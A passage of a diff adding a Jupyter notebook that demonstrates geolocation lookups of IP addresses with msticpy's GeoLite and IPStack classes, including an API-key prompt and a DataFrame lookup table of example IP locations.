+       "<h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'Address':&nbsp;'90.156.201.97',<br>&nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'RU',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;55.7386,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;37.6068,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>&nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>&nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "IpAddress(Address=90.156.201.97, Location={ 'AdditionalData': {},\n",
+       "  'CountryCode': 'RU',\n",
+       " ...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "iplocation = GeoLiteLookup(force_update=True)\n",
+    "loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "\n",
+    "print('Raw result')\n",
+    "display(loc_result)\n",
+    "\n",
+    "print('IP Address Entity')\n",
+    "display(ip_entity[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:54.601359Z",
+     "start_time": "2020-02-08T02:38:54.590367Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Raw result\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[{'continent': {'code': 'EU',\n",
+       "   'geoname_id': 6255148,\n",
+       "   'names': {'de': 'Europa',\n",
+       "    'en': 'Europe',\n",
+       "    'es': 'Europa',\n",
+       "    'fr': 'Europe',\n",
+       "    'ja': 'ヨーロッパ',\n",
+       "    'pt-BR': 'Europa',\n",
+       "    'ru': 'Европа',\n",
+       "    'zh-CN': '欧洲'}},\n",
+       "  'country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'location': {'accuracy_radius': 1000,\n",
+       "   'latitude': 55.7386,\n",
+       "   'longitude': 37.6068,\n",
+       "   'time_zone': 'Europe/Moscow'},\n",
+       "  'registered_country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'traits': {'ip_address': '90.156.201.97', 'prefix_len': 17}}]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entity\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'Address':&nbsp;'90.156.201.97',<br>&nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'RU',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;55.7386,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;37.6068,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>&nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>&nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "IpAddress(Address=90.156.201.97, Location={ 'AdditionalData': {},\n",
+       "  'CountryCode': 'RU',\n",
+       " ...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "iplocation = GeoLiteLookup(auto_update=False)\n",
+    "loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "\n",
+    "print('Raw result')\n",
+    "display(loc_result)\n",
+    "\n",
+    "print('IP Address Entity')\n",
+    "display(ip_entity[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:54.612353Z",
+     "start_time": "2020-02-08T02:38:54.603359Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['151.101.128.223', '151.101.192.223', '151.101.0.223', '151.101.64.223']\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[IpAddress(Address=151.101.128.223, Location={ 'AdditionalData': {},\n",
+       "   'CountryCode': 'US',...),\n",
+       " IpAddress(Address=151.101.192.223, Location={ 'AdditionalData': {},\n",
+       "   'CountryCode': 'US',...),\n",
+       " IpAddress(Address=151.101.0.223, Location={ 'AdditionalData': {},\n",
+       "   'CountryCode': 'US',\n",
+       "  ...),\n",
+       " IpAddress(Address=151.101.64.223, Location={ 'AdditionalData': {},\n",
+       "   'CountryCode': 'US',\n",
+       " ...)]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "import socket\n",
+    "socket_info = socket.getaddrinfo(\"pypi.org\",0,0,0,0)\n",
+    "\n",
+    "ips = [res[4][0] for res in socket_info]\n",
+    "print(ips)\n",
+    "\n",
+    "_, ip_entities = iplocation.lookup_ip(ip_addr_list=ips)\n",
+    "display(ip_entities)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "## IPStack Geo-lookup Class\n",
+    "\n",
+    "#### Class Initialization\n",
+    "\n",
+    "Note - requires IPStack API Key, Optional parameter bulk_lookup allows multiple IPs in a single request. This is only available with the paid Professional tier and above.\n",
+    "```\n",
+    "Init signature: IPStackLookup(api_key: str, bulk_lookup: bool = False)\n",
+    "Docstring:     \n",
+    "GeoIP Lookup using IPStack web service.\n",
+    "\n",
+    "Raises:\n",
+    "    ConnectionError -- Invalid status returned from http request\n",
+    "    PermissionError -- Service refused request (e.g. requesting batch of addresses\n",
+    "            on free tier API key)\n",
+    "Init docstring:\n",
+    "Create a new instance of IPStackLookup.\n",
+    "\n",
+    "Arguments:\n",
+    "    api_key {str} -- API Key from IPStack - see https://ipstack.com\n",
+    "    bulk_lookup {bool} -- For Professional and above tiers allowing you to\n",
+    "        submit multiple IPs in a single request.\n",
+    "        \n",
+    "```\n",
+    "\n",
+    "#### lookup_ip method\n",
+    "```\n",
+    "Signature:\n",
+    "iplocation.lookup_ip(\n",
+    "    ['ip_address: str = None', 'ip_addr_list: collections.abc.Iterable = None', 'ip_entity: msticpy.nbtools.entityschema.IpAddress = None'],\n",
+    ") -&gt; tuple\n",
+    "Docstring:\n",
+    "Lookup IP location from IPStack web service.\n",
+    "\n",
+    "Keyword Arguments:\n",
+    "    ip_address {str} -- a single address to look up (default: {None})\n",
+    "    ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})\n",
+    "    ip_entity {IpAddress} -- an IpAddress entity\n",
+    "\n",
+    "Raises:\n",
+    "    ConnectionError -- Invalid status returned from http request\n",
+    "    PermissionError -- Service refused request (e.g. requesting batch of addresses\n",
+    "        on free tier API key)\n",
+    "\n",
+    "Returns:\n",
+    "    tuple(list{dict}, list{entity}) -- returns raw geolocation results and\n",
+    "        same results as IP/Geolocation entities\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "### You will need a IPStack API key\n",
+    "You will get more detailed results and a higher throughput allowance if you have a paid tier. See IPStack website for more details"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:54.643336Z",
+     "start_time": "2020-02-08T02:38:54.613352Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "This library uses services provided by ipstack.\n",
+       "<a href=\"https://ipstack.com\">https://ipstack.com</a>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "fd2ab27181d94ec7be794001870018dc",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HTML(value='To obtain an API key sign up here https://www.ipstack.com/')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "iplocation = IPStackLookup()\n",
+    "# Enter your IPStack Key here (if not set in msticpyconfig.yaml)\n",
+    "ips_key = nbwidgets.GetEnvironmentKey(env_var='IPSTACK_AUTH',\n",
+    "                           help_str='To obtain an API key sign up here https://www.ipstack.com/',\n",
+    "                           prompt='IPStack API key:')\n",
+    "if not iplocation.settings.args.get(\"AuthKey\"):\n",
+    "    ips_key.display()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:54.761206Z",
+     "start_time": "2020-02-08T02:38:54.646333Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Raw result\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[({'ip': '90.156.201.97',\n",
+       "   'type': 'ipv4',\n",
+       "   'continent_code': 'AS',\n",
+       "   'continent_name': 'Asia',\n",
+       "   'country_code': 'RU',\n",
+       "   'country_name': 'Russia',\n",
+       "   'region_code': 'MOW',\n",
+       "   'region_name': 'Moscow',\n",
+       "   'city': 'Moscow',\n",
+       "   'zip': '115088',\n",
+       "   'latitude': 55.712608337402344,\n",
+       "   'longitude': 37.68056869506836,\n",
+       "   'location': {'geoname_id': 524901,\n",
+       "    'capital': 'Moscow',\n",
+       "    'languages': [{'code': 'ru', 'name': 'Russian', 'native': 'Русский'}],\n",
+       "    'country_flag': 'http://assets.ipstack.com/flags/ru.svg',\n",
+       "    'country_flag_emoji': '🇷🇺',\n",
+       "    'country_flag_emoji_unicode': 'U+1F1F7 U+1F1FA',\n",
+       "    'calling_code': '7',\n",
+       "    'is_eu': False}},\n",
+       "  200)]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entity\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'Address':&nbsp;'90.156.201.97',<br>&nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'City':&nbsp;'Moscow',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'RU',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;55.712608337402344,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;37.68056869506836,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'State':&nbsp;'Moscow',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>&nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>&nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "IpAddress(Address=90.156.201.97, Location={ 'AdditionalData': {},\n",
+       "  'City': 'Moscow',\n",
+       "  'C...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "import os\n",
+    "if not iplocation.settings.args.get(\"AuthKey\") and not ips_key.value:\n",
+    "    raise ValueError(\"No Authentication key in config/environment or supplied by user.\")\n",
+    "if ips_key.value:\n",
+    "    iplocation = IPStackLookup(api_key=ips_key.value)\n",
+    "\n",
+    "if \"MSTICPY_SKIP_IPSTACK_TEST\" not in os.environ:\n",
+    "    loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "    print('Raw result')\n",
+    "    display(loc_result)\n",
+    "\n",
+    "    print('IP Address Entity')\n",
+    "    display(ip_entity[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:55.196405Z",
+     "start_time": "2020-02-08T02:38:54.762206Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Raw results\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[({'ip': '151.101.128.223',\n",
+       "   'type': 'ipv4',\n",
+       "   'continent_code': 'NA',\n",
+       "   'continent_name': 'North America',\n",
+       "   'country_code': 'US',\n",
+       "   'country_name': 'United States',\n",
+       "   'region_code': 'CA',\n",
+       "   'region_name': 'California',\n",
+       "   'city': 'San Francisco',\n",
+       "   'zip': '94107',\n",
+       "   'latitude': 37.76784896850586,\n",
+       "   'longitude': -122.39286041259766,\n",
+       "   'location': {'geoname_id': 5391959,\n",
+       "    'capital': 'Washington D.C.',\n",
+       "    'languages': [{'code': 'en', 'name': 'English', 'native': 'English'}],\n",
+       "    'country_flag': 'http://assets.ipstack.com/flags/us.svg',\n",
+       "    'country_flag_emoji': '🇺🇸',\n",
+       "    'country_flag_emoji_unicode': 'U+1F1FA U+1F1F8',\n",
+       "    'calling_code': '1',\n",
+       "    'is_eu': False}},\n",
+       "  200),\n",
+       " ({'ip': '151.101.192.223',\n",
+       "   'type': 'ipv4',\n",
+       "   'continent_code': 'NA',\n",
+       "   'continent_name': 'North America',\n",
+       "   'country_code': 'US',\n",
+       "   'country_name': 'United States',\n",
+       "   'region_code': 'CA',\n",
+       "   'region_name': 'California',\n",
+       "   'city': 'San Francisco',\n",
+       "   'zip': '94107',\n",
+       "   'latitude': 37.76784896850586,\n",
+       "   'longitude': -122.39286041259766,\n",
+       "   'location': {'geoname_id': 5391959,\n",
+       "    'capital': 'Washington D.C.',\n",
+       "    'languages': [{'code': 'en', 'name': 'English', 'native': 'English'}],\n",
+       "    'country_flag': 'http://assets.ipstack.com/flags/us.svg',\n",
+       "    'country_flag_emoji': '🇺🇸',\n",
+       "    'country_flag_emoji_unicode': 'U+1F1FA U+1F1F8',\n",
+       "    'calling_code': '1',\n",
+       "    'is_eu': False}},\n",
+       "  200),\n",
+       " ({'ip': '151.101.0.223',\n",
+       "   'type': 'ipv4',\n",
+       "   'continent_code': 'NA',\n",
+       "   'continent_name': 'North America',\n",
+       "   'country_code': 'US',\n",
+       "   'country_name': 'United States',\n",
+       "   'region_code': 'CA',\n",
+       "   'region_name': 'California',\n",
+       "   'city': 'San Francisco',\n",
+       "   'zip': '94107',\n",
+       "   'latitude': 37.76784896850586,\n",
+       "   'longitude': -122.39286041259766,\n",
+       "   'location': {'geoname_id': 5391959,\n",
+       "    'capital': 'Washington D.C.',\n",
+       "    'languages': [{'code': 'en', 'name': 'English', 'native': 'English'}],\n",
+       "    'country_flag': 'http://assets.ipstack.com/flags/us.svg',\n",
+       "    'country_flag_emoji': '🇺🇸',\n",
+       "    'country_flag_emoji_unicode': 'U+1F1FA U+1F1F8',\n",
+       "    'calling_code': '1',\n",
+       "    'is_eu': False}},\n",
+       "  200),\n",
+       " ({'ip': '151.101.64.223',\n",
+       "   'type': 'ipv4',\n",
+       "   'continent_code': 'NA',\n",
+       "   'continent_name': 'North America',\n",
+       "   'country_code': 'US',\n",
+       "   'country_name': 'United States',\n",
+       "   'region_code': 'CA',\n",
+       "   'region_name': 'California',\n",
+       "   'city': 'San Francisco',\n",
+       "   'zip': '94107',\n",
+       "   'latitude': 37.76784896850586,\n",
+       "   'longitude': -122.39286041259766,\n",
+       "   'location': {'geoname_id': 5391959,\n",
+       "    'capital': 'Washington D.C.',\n",
+       "    'languages': [{'code': 'en', 'name': 'English', 'native': 'English'}],\n",
+       "    'country_flag': 'http://assets.ipstack.com/flags/us.svg',\n",
+       "    'country_flag_emoji': '🇺🇸',\n",
+       "    'country_flag_emoji_unicode': 'U+1F1FA U+1F1F8',\n",
+       "    'calling_code': '1',\n",
+       "    'is_eu': False}},\n",
+       "  200)]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entities\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[IpAddress(Address=151.101.128.223, Location={ 'AdditionalData': {},\n",
+       "   'City': 'San Francis...),\n",
+       " IpAddress(Address=151.101.192.223, Location={ 'AdditionalData': {},\n",
+       "   'City': 'San Francis...),\n",
+       " IpAddress(Address=151.101.0.223, Location={ 'AdditionalData': {},\n",
+       "   'City': 'San Francisco...),\n",
+       " IpAddress(Address=151.101.64.223, Location={ 'AdditionalData': {},\n",
+       "   'City': 'San Francisc...)]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "if \"MSTICPY_SKIP_IPSTACK_TEST\" not in os.environ:\n",
+    "    loc_result, ip_entities = iplocation.lookup_ip(ip_addr_list=ips)\n",
+    "    print('Raw results')\n",
+    "    display(loc_result)\n",
+    "\n",
+    "    print('IP Address Entities')\n",
+    "    display(ip_entities)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "## Taking input from a pandas DataFrame\n",
+    "\n",
+    "The base class for both implementations has a method that sources the ip addresses from a dataframe column and returns a new dataframe with the location information merged with the input frame\n",
+    "```\n",
+    "Signature: iplocation.df_lookup_ip(data: pandas.core.frame.DataFrame, column: str)\n",
+    "Docstring:\n",
+    "Lookup Geolocation data from a pandas Dataframe.\n",
+    "\n",
+    "Keyword Arguments:\n",
+    "    data {pd.DataFrame} -- pandas dataframe containing IpAddress column\n",
+    "    column {str} -- the name of the dataframe column to use as a source\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:55.262352Z",
+     "start_time": "2020-02-08T02:38:55.197381Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>65.55.44.109</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>13.71.172.128</td>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>13.71.172.130</td>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>40.124.45.19</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Texas</td>\n",
+       "      <td>San Antonio</td>\n",
+       "      <td>-98.4926</td>\n",
+       "      <td>29.4221</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>40.124.45.19</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>104.43.212.12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Iowa</td>\n",
+       "      <td>Des Moines</td>\n",
+       "      <td>-93.6127</td>\n",
+       "      <td>41.6015</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>104.43.212.12</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>82</th>\n",
+       "      <td>20.41.41.23</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>20.41.41.23</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>83</th>\n",
+       "      <td>52.179.17.38</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>52.179.17.38</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>84</th>\n",
+       "      <td>157.55.134.142</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>157.55.134.142</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>85</th>\n",
+       "      <td>172.217.15.110</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-97.8220</td>\n",
+       "      <td>37.7510</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>172.217.15.110</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>86</th>\n",
+       "      <td>40.91.75.5</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-122.3412</td>\n",
+       "      <td>47.6032</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>40.91.75.5</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>87 rows × 12 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "         AllExtIPs CountryCode    CountryName       State         City  \\\n",
+       "0     65.55.44.109          US  United States    Virginia      Boydton   \n",
+       "1    13.71.172.128          CA         Canada     Ontario      Toronto   \n",
+       "2    13.71.172.130          CA         Canada     Ontario      Toronto   \n",
+       "3     40.124.45.19          US  United States       Texas  San Antonio   \n",
+       "4    104.43.212.12          US  United States        Iowa   Des Moines   \n",
+       "..             ...         ...            ...         ...          ...   \n",
+       "82     20.41.41.23          US  United States    Virginia      Boydton   \n",
+       "83    52.179.17.38          US  United States    Virginia   Washington   \n",
+       "84  157.55.134.142          US  United States    Virginia   Washington   \n",
+       "85  172.217.15.110          US  United States        None         None   \n",
